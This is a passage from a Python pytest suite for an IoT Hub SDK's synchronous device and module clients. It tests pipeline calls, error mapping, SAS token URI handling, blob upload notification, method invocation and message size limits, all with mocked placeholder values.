client.receive_message(block=block, timeout=timeout)
# Feature was not enabled
assert mqtt_pipeline.enable_feature.call_count == 0
# Inbox get was not called
assert inbox_mock.get.call_count == 0
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - .receive_method_request()")
class TestIoTHubDeviceClientReceiveMethodRequest(
IoTHubDeviceClientTestsConfig, SharedClientReceiveMethodRequestTests
):
pass
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - .send_method_response()")
class TestIoTHubDeviceClientSendMethodResponse(
IoTHubDeviceClientTestsConfig, SharedClientSendMethodResponseTests
):
pass
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - .get_twin()")
class TestIoTHubDeviceClientGetTwin(IoTHubDeviceClientTestsConfig, SharedClientGetTwinTests):
pass
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - .patch_twin_reported_properties()")
class TestIoTHubDeviceClientPatchTwinReportedProperties(
IoTHubDeviceClientTestsConfig, SharedClientPatchTwinReportedPropertiesTests
):
pass
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - .receive_twin_desired_properties_patch()")
class TestIoTHubDeviceClientReceiveTwinDesiredPropertiesPatch(
IoTHubDeviceClientTestsConfig, SharedClientReceiveTwinDesiredPropertiesPatchTests
):
pass
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - .get_storage_info_for_blob()")
class TestIoTHubDeviceClientGetStorageInfo(WaitsForEventCompletion, IoTHubDeviceClientTestsConfig):
@pytest.mark.it("Begins a 'get_storage_info_for_blob' HTTPPipeline operation")
def test_calls_pipeline_get_storage_info_for_blob(self, mocker, client, http_pipeline):
fake_blob_name = "__fake_blob_name__"
client.get_storage_info_for_blob(fake_blob_name)
assert http_pipeline.get_storage_info_for_blob.call_count == 1
assert http_pipeline.get_storage_info_for_blob.call_args == mocker.call(
fake_blob_name, callback=mocker.ANY
)
@pytest.mark.it(
"Waits for the completion of the 'get_storage_info_for_blob' pipeline operation before returning"
)
def test_waits_for_pipeline_op_completion(
self, mocker, client_manual_cb, http_pipeline_manual_cb
):
fake_blob_name = "__fake_blob_name__"
self.add_event_completion_checks(
mocker=mocker,
pipeline_function=http_pipeline_manual_cb.get_storage_info_for_blob,
kwargs={"storage_info": "__fake_storage_info__"},
)
client_manual_cb.get_storage_info_for_blob(fake_blob_name)
@pytest.mark.it(
"Raises a client error if the `get_storage_info_for_blob` pipeline operation calls back with a pipeline error"
)
@pytest.mark.parametrize(
"pipeline_error,client_error",
[
pytest.param(
pipeline_exceptions.ProtocolClientError,
client_exceptions.ClientError,
id="ProtocolClientError->ClientError",
),
pytest.param(
pipeline_exceptions.OperationCancelled,
client_exceptions.OperationCancelled,
id="OperationCancelled -> OperationCancelled",
),
pytest.param(Exception, client_exceptions.ClientError, id="Exception->ClientError"),
],
)
def test_raises_error_on_pipeline_op_error(
self, mocker, client_manual_cb, http_pipeline_manual_cb, pipeline_error, client_error
):
fake_blob_name = "__fake_blob_name__"
my_pipeline_error = pipeline_error()
self.add_event_completion_checks(
mocker=mocker,
pipeline_function=http_pipeline_manual_cb.get_storage_info_for_blob,
kwargs={"error": my_pipeline_error},
)
with pytest.raises(client_error) as e_info:
client_manual_cb.get_storage_info_for_blob(fake_blob_name)
assert e_info.value.__cause__ is my_pipeline_error
@pytest.mark.it("Returns a storage_info object upon successful completion")
def test_returns_storage_info(self, mocker, client, http_pipeline):
fake_blob_name = "__fake_blob_name__"
fake_storage_info = "__fake_storage_info__"
received_storage_info = client.get_storage_info_for_blob(fake_blob_name)
assert http_pipeline.get_storage_info_for_blob.call_count == 1
assert http_pipeline.get_storage_info_for_blob.call_args == mocker.call(
fake_blob_name, callback=mocker.ANY
)
assert (
received_storage_info is fake_storage_info
) # Note: the return value this is checkign for is defined in client_fixtures.py
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - .notify_blob_upload_status()")
class TestIoTHubDeviceClientNotifyBlobUploadStatus(
WaitsForEventCompletion, IoTHubDeviceClientTestsConfig
):
@pytest.mark.it("Begins a 'notify_blob_upload_status' HTTPPipeline operation")
def test_calls_pipeline_notify_blob_upload_status(self, client, http_pipeline):
correlation_id = "__fake_correlation_id__"
is_success = "__fake_is_success__"
status_code = "__fake_status_code__"
status_description = "__fake_status_description__"
client.notify_blob_upload_status(
correlation_id, is_success, status_code, status_description
)
kwargs = http_pipeline.notify_blob_upload_status.call_args[1]
assert http_pipeline.notify_blob_upload_status.call_count == 1
assert kwargs["correlation_id"] is correlation_id
assert kwargs["is_success"] is is_success
assert kwargs["status_code"] is status_code
assert kwargs["status_description"] is status_description
@pytest.mark.it(
"Waits for the completion of the 'notify_blob_upload_status' pipeline operation before returning"
)
def test_waits_for_pipeline_op_completion(
self, mocker, client_manual_cb, http_pipeline_manual_cb
):
correlation_id = "__fake_correlation_id__"
is_success = "__fake_is_success__"
status_code = "__fake_status_code__"
status_description = "__fake_status_description__"
self.add_event_completion_checks(
mocker=mocker, pipeline_function=http_pipeline_manual_cb.notify_blob_upload_status
)
client_manual_cb.notify_blob_upload_status(
correlation_id, is_success, status_code, status_description
)
@pytest.mark.it(
"Raises a client error if the `notify_blob_upload_status` pipeline operation calls back with a pipeline error"
)
@pytest.mark.parametrize(
"pipeline_error,client_error",
[
pytest.param(
pipeline_exceptions.ProtocolClientError,
client_exceptions.ClientError,
id="ProtocolClientError->ClientError",
),
pytest.param(
pipeline_exceptions.OperationCancelled,
client_exceptions.OperationCancelled,
id="OperationCancelled -> OperationCancelled",
),
pytest.param(Exception, client_exceptions.ClientError, id="Exception->ClientError"),
],
)
def test_raises_error_on_pipeline_op_error(
self, mocker, client_manual_cb, http_pipeline_manual_cb, pipeline_error, client_error
):
correlation_id = "__fake_correlation_id__"
is_success = "__fake_is_success__"
status_code = "__fake_status_code__"
status_description = "__fake_status_description__"
my_pipeline_error = pipeline_error()
self.add_event_completion_checks(
mocker=mocker,
pipeline_function=http_pipeline_manual_cb.notify_blob_upload_status,
kwargs={"error": my_pipeline_error},
)
with pytest.raises(client_error) as e_info:
client_manual_cb.notify_blob_upload_status(
correlation_id, is_success, status_code, status_description
)
assert e_info.value.__cause__ is my_pipeline_error
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - PROPERTY .on_message_received")
class TestIoTHubDeviceClientPROPERTYOnMessageReceivedHandler(
IoTHubDeviceClientTestsConfig, SharedIoTHubClientPROPERTYReceiverHandlerTests
):
@pytest.fixture
def handler_name(self):
return "on_message_received"
@pytest.fixture
def feature_name(self):
return pipeline_constant.C2D_MSG
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - PROPERTY .on_method_request_received")
class TestIoTHubDeviceClientPROPERTYOnMethodRequestReceivedHandler(
IoTHubDeviceClientTestsConfig, SharedIoTHubClientPROPERTYReceiverHandlerTests
):
@pytest.fixture
def handler_name(self):
return "on_method_request_received"
@pytest.fixture
def feature_name(self):
return pipeline_constant.METHODS
@pytest.mark.describe(
"IoTHubDeviceClient (Synchronous) - PROPERTY .on_twin_desired_properties_patch_received"
)
class TestIoTHubDeviceClientPROPERTYOnTwinDesiredPropertiesPatchReceivedHandler(
IoTHubDeviceClientTestsConfig, SharedIoTHubClientPROPERTYReceiverHandlerTests
):
@pytest.fixture
def handler_name(self):
return "on_twin_desired_properties_patch_received"
@pytest.fixture
def feature_name(self):
return pipeline_constant.TWIN_PATCHES
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - PROPERTY .on_connection_state_change")
class TestIoTHubDeviceClientPROPERTYOnConnectionStateChangeHandler(
IoTHubDeviceClientTestsConfig, SharedIoTHubClientPROPERTYHandlerTests
):
@pytest.fixture
def handler_name(self):
return "on_connection_state_change"
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - PROPERTY .on_new_sastoken_required")
class TestIoTHubDeviceClientPROPERTYOnNewSastokenRequiredHandler(
IoTHubDeviceClientTestsConfig, SharedIoTHubClientPROPERTYHandlerTests
):
@pytest.fixture
def handler_name(self):
return "on_new_sastoken_required"
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - PROPERTY .connected")
class TestIoTHubDeviceClientPROPERTYConnected(
IoTHubDeviceClientTestsConfig, SharedIoTHubClientPROPERTYConnectedTests
):
pass
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - OCCURRENCE: Connect")
class TestIoTHubDeviceClientOCCURRENCEConnect(
IoTHubDeviceClientTestsConfig, SharedIoTHubClientOCCURRENCEConnectTests
):
pass
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - OCCURRENCE: Disconnect")
class TestIoTHubDeviceClientOCCURRENCEDisconnect(
IoTHubDeviceClientTestsConfig, SharedIoTHubClientOCCURRENCEDisconnectTests
):
pass
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - OCCURRENCE: New Sastoken Required")
class TestIoTHubDeviceClientOCCURRENCENewSastokenRequired(
IoTHubDeviceClientTestsConfig, SharedIoTHubClientOCCURRENCENewSastokenRequired
):
pass
################
# MODULE TESTS #
################
class IoTHubModuleClientTestsConfig(object):
@pytest.fixture
def client_class(self):
return IoTHubModuleClient
@pytest.fixture
def client(self, mqtt_pipeline, http_pipeline):
"""This client automatically resolves callbacks sent to the pipeline.
It should be used for the majority of tests.
"""
return IoTHubModuleClient(mqtt_pipeline, http_pipeline)
@pytest.fixture
def client_manual_cb(self, mqtt_pipeline_manual_cb, http_pipeline_manual_cb):
"""This client requires manual triggering of the callbacks sent to the pipeline.
It should only be used for tests where manual control fo a callback is required.
"""
return IoTHubModuleClient(mqtt_pipeline_manual_cb, http_pipeline_manual_cb)
@pytest.fixture
def connection_string(self, module_connection_string):
"""This fixture is parametrized to provie all valid device connection strings.
See client_fixtures.py
"""
return module_connection_string
@pytest.fixture
def sas_token_string(self, module_sas_token_string):
return module_sas_token_string
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - Instantiation")
class TestIoTHubModuleClientInstantiation(
IoTHubModuleClientTestsConfig, SharedIoTHubClientInstantiationTests
):
@pytest.mark.it("Sets on_input_message_received handler in the MQTTPipeline")
def test_sets_on_input_message_received_handler_in_pipeline(
self, client_class, mqtt_pipeline, http_pipeline
):
client = client_class(mqtt_pipeline, http_pipeline)
assert client._mqtt_pipeline.on_input_message_received is not None
assert (
client._mqtt_pipeline.on_input_message_received
== client._inbox_manager.route_input_message
)
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - .create_from_connection_string()")
class TestIoTHubModuleClientCreateFromConnectionString(
IoTHubModuleClientTestsConfig, SharedIoTHubClientCreateFromConnectionStringTests
):
pass
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - .create_from_sastoken()")
class TestIoTHubModuleClientCreateFromSastoken(
IoTHubModuleClientTestsConfig, SharedIoTHubModuleClientCreateFromSastokenTests
):
pass
@pytest.mark.describe(
"IoTHubModuleClient (Synchronous) - .create_from_edge_environment() -- Edge Container Environment"
)
class TestIoTHubModuleClientCreateFromEdgeEnvironmentWithContainerEnv(
IoTHubModuleClientTestsConfig,
SharedIoTHubModuleClientCreateFromEdgeEnvironmentWithContainerEnvTests,
):
pass
@pytest.mark.describe(
"IoTHubModuleClient (Synchronous) - .create_from_edge_environment() -- Edge Local Debug Environment"
)
class TestIoTHubModuleClientCreateFromEdgeEnvironmentWithDebugEnv(
IoTHubModuleClientTestsConfig,
SharedIoTHubModuleClientCreateFromEdgeEnvironmentWithDebugEnvTests,
):
pass
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - .create_from_x509_certificate()")
class TestIoTHubModuleClientCreateFromX509Certificate(
IoTHubModuleClientTestsConfig, SharedIoTHubModuleClientCreateFromX509CertificateTests
):
pass
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - .shutdown()")
class TestIoTHubModuleClientShutdown(IoTHubModuleClientTestsConfig, SharedClientShutdownTests):
pass
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - .update_sastoken()")
class TestIoTHubModuleClientUpdateSasToken(
IoTHubModuleClientTestsConfig, SharedClientUpdateSasTokenTests
):
@pytest.fixture
def module_id(self, sas_token_string):
# NOTE: This is kind of unconventional, but this is the easiest way to extract the
# module id from a sastoken string
sastoken = st.NonRenewableSasToken(sas_token_string)
token_uri_pieces = sastoken.resource_uri.split("/")
module_id = token_uri_pieces[4]
return module_id
@pytest.fixture
def sas_config(self, sas_token_string):
"""PipelineConfig set up as if using user-provided, non-renewable SAS auth"""
sastoken = st.NonRenewableSasToken(sas_token_string)
token_uri_pieces = sastoken.resource_uri.split("/")
hostname = token_uri_pieces[0]
device_id = token_uri_pieces[2]
module_id = token_uri_pieces[4]
sas_config = IoTHubPipelineConfig(
hostname=hostname, device_id=device_id, module_id=module_id, sastoken=sastoken
)
return sas_config
@pytest.fixture
def uri(self, hostname, device_id, module_id):
return "{hostname}/devices/{device_id}/modules/{module_id}".format(
hostname=hostname, device_id=device_id, module_id=module_id
)
@pytest.fixture(
params=["Nonmatching Device ID", "Nonmatching Module ID", "Nonmatching Hostname"]
)
def nonmatching_uri(self, request, device_id, module_id, hostname):
# NOTE: It would be preferable to have this as a parametrization on a test rather than a
# fixture, however, we need to use the device_id and hostname fixtures in order to ensure
# tests don't break when other fixtures change, and you can't include fixtures in a
# parametrization, so this also has to be a fixture
uri_format = "{hostname}/devices/{device_id}/modules/{module_id}"
if request.param == "Nonmatching Device ID":
return uri_format.format(
hostname=hostname, device_id="nonmatching_device", module_id=module_id
)
elif request.param == "Nonmatching Module ID":
return uri_format.format(
hostname=hostname, device_id=device_id, module_id="nonmatching_module"
)
else:
return uri_format.format(
hostname="nonmatching_hostname", device_id=device_id, module_id=module_id
)
@pytest.fixture(
params=[
"Too short",
"Too long",
"Incorrectly formatted device notation",
"Incorrectly formatted module notation",
"Device URI",
]
)
def invalid_uri(self, request, device_id, module_id, hostname):
# NOTE: As in the nonmatching_uri fixture above, this is a workaround for parametrization
# that allows the usage of other fixtures in the parametrized value. Weird pattern, but
# necessary to ensure stability of the tests over time.
if request.param == "Too short":
# Doesn't have module ID
return "{}/devices/{}/modules".format(hostname, device_id)
elif request.param == "Too long":
# Extraneous value at the end
return "{}/devices/{}/modules/{}/somethingElse".format(hostname, device_id, module_id)
elif request.param == "Incorrectly formatted device notation":
# Doesn't have '/devices/'
return "{}/not-devices/{}/modules/{}".format(hostname, device_id, module_id)
elif request.param == "Incorrectly formatted module notation":
# Doesn't have '/modules/'
return "{}/devices/{}/not-modules/{}".format(hostname, device_id, module_id)
else:
# Valid... for a Device... but this is a Module
return "{}/devices/{}/".format(hostname, device_id)
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - .connect()")
class TestIoTHubModuleClientConnect(IoTHubModuleClientTestsConfig, SharedClientConnectTests):
pass
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - .disconnect()")
class TestIoTHubModuleClientDisconnect(IoTHubModuleClientTestsConfig, SharedClientDisconnectTests):
pass
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - .send_message()")
class TestIoTHubNModuleClientSendD2CMessage(
IoTHubModuleClientTestsConfig, SharedClientSendD2CMessageTests
):
pass
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - .send_message_to_output()")
class TestIoTHubModuleClientSendToOutput(IoTHubModuleClientTestsConfig, WaitsForEventCompletion):
@pytest.mark.it("Begins a 'send_output_message' pipeline operation")
def test_calls_pipeline_send_message_to_output(self, client, mqtt_pipeline, message):
output_name = "some_output"
client.send_message_to_output(message, output_name)
assert mqtt_pipeline.send_output_message.call_count == 1
assert mqtt_pipeline.send_output_message.call_args[0][0] is message
assert message.output_name == output_name
@pytest.mark.it(
"Waits for the completion of the 'send_output_message' pipeline operation before returning"
)
def test_waits_for_pipeline_op_completion(
self, mocker, client_manual_cb, mqtt_pipeline_manual_cb, message
):
self.add_event_completion_checks(
mocker=mocker, pipeline_function=mqtt_pipeline_manual_cb.send_output_message
)
output_name = "some_output"
client_manual_cb.send_message_to_output(message, output_name)
@pytest.mark.it(
"Raises a client error if the `send_out_event` pipeline operation calls back with a pipeline error"
)
@pytest.mark.parametrize(
"pipeline_error,client_error",
[
pytest.param(
pipeline_exceptions.ConnectionDroppedError,
client_exceptions.ConnectionDroppedError,
id="ConnectionDroppedError->ConnectionDroppedError",
),
pytest.param(
pipeline_exceptions.ConnectionFailedError,
client_exceptions.ConnectionFailedError,
id="ConnectionFailedError->ConnectionFailedError",
),
pytest.param(
pipeline_exceptions.NoConnectionError,
client_exceptions.NoConnectionError,
id="NoConnectionError->NoConnectionError",
),
pytest.param(
pipeline_exceptions.UnauthorizedError,
client_exceptions.CredentialError,
id="UnauthorizedError->CredentialError",
),
pytest.param(
pipeline_exceptions.ProtocolClientError,
client_exceptions.ClientError,
id="ProtocolClientError->ClientError",
),
pytest.param(
pipeline_exceptions.OperationCancelled,
client_exceptions.OperationCancelled,
id="OperationCancelled -> OperationCancelled",
),
pytest.param(Exception, client_exceptions.ClientError, id="Exception->ClientError"),
],
)
def test_raises_error_on_pipeline_op_error(
self,
mocker,
client_manual_cb,
mqtt_pipeline_manual_cb,
message,
pipeline_error,
client_error,
):
my_pipeline_error = pipeline_error()
self.add_event_completion_checks(
mocker=mocker,
pipeline_function=mqtt_pipeline_manual_cb.send_output_message,
kwargs={"error": my_pipeline_error},
)
output_name = "some_output"
with pytest.raises(client_error) as e_info:
client_manual_cb.send_message_to_output(message, output_name)
assert e_info.value.__cause__ is my_pipeline_error
@pytest.mark.it(
"Wraps 'message' input parameter in Message object if it is not a Message object"
)
@pytest.mark.parametrize(
"message_input",
[
pytest.param("message", id="String input"),
pytest.param(222, id="Integer input"),
pytest.param(object(), id="Object input"),
pytest.param(None, id="None input"),
pytest.param([1, "str"], id="List input"),
pytest.param({"a": 2}, id="Dictionary input"),
],
)
def test_send_message_to_output_calls_pipeline_wraps_data_in_message(
self, client, mqtt_pipeline, message_input
):
output_name = "some_output"
client.send_message_to_output(message_input, output_name)
assert mqtt_pipeline.send_output_message.call_count == 1
sent_message = mqtt_pipeline.send_output_message.call_args[0][0]
assert isinstance(sent_message, Message)
assert sent_message.data == message_input
@pytest.mark.it("Raises error when message data size is greater than 256 KB")
def test_raises_error_when_message_to_output_data_greater_than_256(self, client, mqtt_pipeline):
output_name = "some_output"
data_input = "serpensortia" * 256000
message = Message(data_input)
with pytest.raises(ValueError) as e_info:
client.send_message_to_output(message, output_name)
assert "256 KB" in e_info.value.args[0]
assert mqtt_pipeline.send_output_message.call_count == 0
@pytest.mark.it("Raises error when message size is greater than 256 KB")
def test_raises_error_when_message_to_output_size_greater_than_256(self, client, mqtt_pipeline):
output_name = "some_output"
data_input = "serpensortia"
message = Message(data_input)
message.custom_properties["spell"] = data_input * 256000
with pytest.raises(ValueError) as e_info:
client.send_message_to_output(message, output_name)
assert "256 KB" in e_info.value.args[0]
assert mqtt_pipeline.send_output_message.call_count == 0
@pytest.mark.it("Does not raises error when message data size is equal to 256 KB")
def test_raises_error_when_message_to_output_data_equal_to_256(self, client, mqtt_pipeline):
output_name = "some_output"
data_input = "a" * 262095
message = Message(data_input)
# This check was put as message class may undergo the default content type encoding change
# and the above calculation will change.
# Had to do greater than check for python 2. Ideally should be not equal check
if message.get_size() > device_constant.TELEMETRY_MESSAGE_SIZE_LIMIT:
assert False
client.send_message_to_output(message, output_name)
assert mqtt_pipeline.send_output_message.call_count == 1
sent_message = mqtt_pipeline.send_output_message.call_args[0][0]
assert isinstance(sent_message, Message)
assert sent_message.data == data_input
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - .receive_message_on_input()")
class TestIoTHubModuleClientReceiveInputMessage(IoTHubModuleClientTestsConfig):
@pytest.mark.it("Implicitly enables input messaging feature if not already enabled")
def test_enables_input_messaging_only_if_not_already_enabled(
self, mocker, client, mqtt_pipeline
):
mocker.patch.object(
SyncClientInbox, "get"
) # patch this receive_message_on_input won't block
input_name = "some_input"
# Verify Input Messaging enabled if not enabled
mqtt_pipeline.feature_enabled.__getitem__.return_value = (
False # Input Messages will appear disabled
)
client.receive_message_on_input(input_name)
assert mqtt_pipeline.enable_feature.call_count == 1
assert mqtt_pipeline.enable_feature.call_args[0][0] == pipeline_constant.INPUT_MSG
mqtt_pipeline.enable_feature.reset_mock()
# Verify Input Messaging not enabled if already enabled
mqtt_pipeline.feature_enabled.__getitem__.return_value = (
True # Input Messages will appear enabled
)
client.receive_message_on_input(input_name)
assert mqtt_pipeline.enable_feature.call_count == 0
@pytest.mark.it("Returns a message from the input inbox, if available")
def test_returns_message_from_input_inbox(self, mocker, client, message):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
inbox_mock.get.return_value = message
manager_get_inbox_mock = mocker.patch.object(
client._inbox_manager, "get_input_message_inbox", return_value=inbox_mock
)
input_name = "some_input"
received_message = client.receive_message_on_input(input_name)
assert manager_get_inbox_mock.call_count == 1
assert manager_get_inbox_mock.call_args == mocker.call(input_name)
assert inbox_mock.get.call_count == 1
assert received_message is message
@pytest.mark.it("Can be called in various modes")
@pytest.mark.parametrize(
"block,timeout",
[
pytest.param(True, None, id="Blocking, no timeout"),
pytest.param(True, 10, id="Blocking with timeout"),
pytest.param(False, None, id="Nonblocking"),
],
)
def test_can_be_called_in_mode(self, mocker, client, block, timeout):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
mocker.patch.object(
client._inbox_manager, "get_input_message_inbox", return_value=inbox_mock
)
input_name = "some_input"
client.receive_message_on_input(input_name, block=block, timeout=timeout)
assert inbox_mock.get.call_count == 1
assert inbox_mock.get.call_args == mocker.call(block=block, timeout=timeout)
@pytest.mark.it("Defaults to blocking mode with no timeout")
def test_default_mode(self, mocker, client):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
mocker.patch.object(
client._inbox_manager, "get_input_message_inbox", return_value=inbox_mock
)
input_name = "some_input"
client.receive_message_on_input(input_name)
assert inbox_mock.get.call_count == 1
assert inbox_mock.get.call_args == mocker.call(block=True, timeout=None)
@pytest.mark.it("Blocks until a message is available, in blocking mode")
def test_no_message_in_inbox_blocking_mode(self, client, message):
input_name = "some_input"
input_inbox = client._inbox_manager.get_input_message_inbox(input_name)
assert input_inbox.empty()
def insert_item_after_delay():
time.sleep(0.01)
input_inbox.put(message)
insertion_thread = threading.Thread(target=insert_item_after_delay)
insertion_thread.start()
received_message = client.receive_message_on_input(input_name, block=True)
assert received_message is message
# This proves that the blocking happens because 'received_message' can't be
# 'message' until after a 10 millisecond delay on the insert. But because the
# 'received_message' IS 'message', it means that client.receive_message_on_input
# did not return until after the delay.
@pytest.mark.it(
"Returns None after a timeout while blocking, in blocking mode with a specified timeout"
)
def test_times_out_waiting_for_message_blocking_mode(self, client):
input_name = "some_input"
result = client.receive_message_on_input(input_name, block=True, timeout=0.01)
assert result is None
@pytest.mark.it("Returns None immediately if there are no messages, in nonblocking mode")
def test_no_message_in_inbox_nonblocking_mode(self, client):
input_name = "some_input"
result = client.receive_message_on_input(input_name, block=False)
assert result is None
@pytest.mark.it("Locks the client to API Receive Mode if the receive mode has not yet been set")
@pytest.mark.parametrize(
"block,timeout",
[
pytest.param(True, None, id="Blocking, no timeout"),
pytest.param(True, 10, id="Blocking with timeout"),
pytest.param(False, None, id="Nonblocking"),
],
)
def test_receive_mode_not_set(self, mocker, client, block, timeout):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
mocker.patch.object(
client._inbox_manager, "get_input_message_inbox", return_value=inbox_mock
)
assert client._receive_type is RECEIVE_TYPE_NONE_SET
client.receive_message_on_input(input_name="some_input", block=block, timeout=timeout)
assert client._receive_type is RECEIVE_TYPE_API
@pytest.mark.it(
"Does not modify the client receive mode if it has already been set to API Receive Mode"
)
@pytest.mark.parametrize(
"block,timeout",
[
pytest.param(True, None, id="Blocking, no timeout"),
pytest.param(True, 10, id="Blocking with timeout"),
pytest.param(False, None, id="Nonblocking"),
],
)
def test_receive_mode_set_api(self, mocker, client, block, timeout):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
mocker.patch.object(
client._inbox_manager, "get_input_message_inbox", return_value=inbox_mock
)
client._receive_type = RECEIVE_TYPE_API
client.receive_message_on_input(input_name="some_input", block=block, timeout=timeout)
assert client._receive_type is RECEIVE_TYPE_API
@pytest.mark.it(
"Raises a ClientError and does nothing else if the client receive mode has been set to Handler Receive Mode"
)
@pytest.mark.parametrize(
"block,timeout",
[
pytest.param(True, None, id="Blocking, no timeout"),
pytest.param(True, 10, id="Blocking with timeout"),
pytest.param(False, None, id="Nonblocking"),
],
)
def test_receive_mode_set_handler(self, mocker, client, mqtt_pipeline, block, timeout):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
mocker.patch.object(
client._inbox_manager, "get_input_message_inbox", return_value=inbox_mock
)
# patch this so we can make sure feature enabled isn't modified
mqtt_pipeline.feature_enabled.__getitem__.return_value = False
client._receive_type = RECEIVE_TYPE_HANDLER
# Error was raised
with pytest.raises(client_exceptions.ClientError):
client.receive_message_on_input(input_name="some_input", block=block, timeout=timeout)
# Feature was not enabled
assert mqtt_pipeline.enable_feature.call_count == 0
# Inbox get was not called
assert inbox_mock.get.call_count == 0
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - .receive_method_request()")
class TestIoTHubModuleClientReceiveMethodRequest(
IoTHubModuleClientTestsConfig, SharedClientReceiveMethodRequestTests
):
pass
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - .send_method_response()")
class TestIoTHubModuleClientSendMethodResponse(
IoTHubModuleClientTestsConfig, SharedClientSendMethodResponseTests
):
pass
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - .get_twin()")
class TestIoTHubModuleClientGetTwin(IoTHubModuleClientTestsConfig, SharedClientGetTwinTests):
pass
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - .patch_twin_reported_properties()")
class TestIoTHubModuleClientPatchTwinReportedProperties(
IoTHubModuleClientTestsConfig, SharedClientPatchTwinReportedPropertiesTests
):
pass
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - .receive_twin_desired_properties_patch()")
class TestIoTHubModuleClientReceiveTwinDesiredPropertiesPatch(
IoTHubModuleClientTestsConfig, SharedClientReceiveTwinDesiredPropertiesPatchTests
):
pass
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - .invoke_method()")
class TestIoTHubModuleClientInvokeMethod(WaitsForEventCompletion, IoTHubModuleClientTestsConfig):
@pytest.mark.it("Begins a 'invoke_method' HTTPPipeline operation where the target is a device")
def test_calls_pipeline_invoke_method_for_device(self, client, http_pipeline):
method_params = {"methodName": "__fake_method_name__"}
device_id = "__fake_device_id__"
client.invoke_method(method_params, device_id)
assert http_pipeline.invoke_method.call_count == 1
assert http_pipeline.invoke_method.call_args[0][0] is device_id
assert http_pipeline.invoke_method.call_args[0][1] is method_params
@pytest.mark.it("Begins a 'invoke_method' HTTPPipeline operation where the target is a module")
def test_calls_pipeline_invoke_method_for_module(self, client, http_pipeline):
method_params = {"methodName": "__fake_method_name__"}
device_id = "__fake_device_id__"
module_id = "__fake_module_id__"
client.invoke_method(method_params, device_id, module_id=module_id)
assert http_pipeline.invoke_method.call_count == 1
assert http_pipeline.invoke_method.call_args[0][0] is device_id
assert http_pipeline.invoke_method.call_args[0][1] is method_params
assert http_pipeline.invoke_method.call_args[1]["module_id"] is module_id
@pytest.mark.it(
"Waits for the completion of the 'invoke_method' pipeline operation before returning"
)
def test_waits_for_pipeline_op_completion(
self, mocker, client_manual_cb, http_pipeline_manual_cb
):
method_params = {"methodName": "__fake_method_name__"}
device_id = "__fake_device_id__"
module_id = "__fake_module_id__"
self.add_event_completion_checks(
mocker=mocker,
pipeline_function=http_pipeline_manual_cb.invoke_method,
kwargs={"invoke_method_response": "__fake_invoke_method_response__"},
)
client_manual_cb.invoke_method(method_params, device_id, module_id=module_id)
@pytest.mark.it(
"Raises a client error if the `invoke_method` pipeline operation calls back with a pipeline error"
)
@pytest.mark.parametrize(
"pipeline_error,client_error",
[
pytest.param(
pipeline_exceptions.ProtocolClientError,
client_exceptions.ClientError,
id="ProtocolClientError->ClientError",
),
pytest.param(
pipeline_exceptions.OperationCancelled,
client_exceptions.OperationCancelled,
id="OperationCancelled -> OperationCancelled",
),
pytest.param(Exception, client_exceptions.ClientError, id="Exception->ClientError"),
],
)
def test_raises_error_on_pipeline_op_error(
self, mocker, client_manual_cb, http_pipeline_manual_cb, pipeline_error, client_error
):
method_params = {"methodName": "__fake_method_name__"}
device_id = "__fake_device_id__"
module_id = "__fake_module_id__"
my_pipeline_error = pipeline_error()
self.add_event_completion_checks(
mocker=mocker,
pipeline_function=http_pipeline_manual_cb.invoke_method,
kwargs={"error": my_pipeline_error},
)
with pytest.raises(client_error) as e_info:
client_manual_cb.invoke_method(method_params, device_id, module_id=module_id)
assert e_info.value.__cause__ is my_pipeline_error
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - PROPERTY .on_message_received")
class TestIoTHubModuleClientPROPERTYOnMessageReceivedHandler(
IoTHubModuleClientTestsConfig, SharedIoTHubClientPROPERTYReceiverHandlerTests
):
@pytest.fixture
def handler_name(self):
return "on_message_received"
@pytest.fixture
def feature_name(self):
return pipeline_constant.INPUT_MSG
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - PROPERTY .on_method_request_received")
class TestIoTHubModuleClientPROPERTYOnMethodRequestReceivedHandler(
IoTHubModuleClientTestsConfig, SharedIoTHubClientPROPERTYReceiverHandlerTests
):
@pytest.fixture
def handler_name(self):
return "on_method_request_received"
@pytest.fixture
def feature_name(self):
return pipeline_constant.METHODS
@pytest.mark.describe(
"IoTHubModuleClient (Synchronous) - PROPERTY .on_twin_desired_properties_patch_received"
)
class TestIoTHubModuleClientPROPERTYOnTwinDesiredPropertiesPatchReceivedHandler(
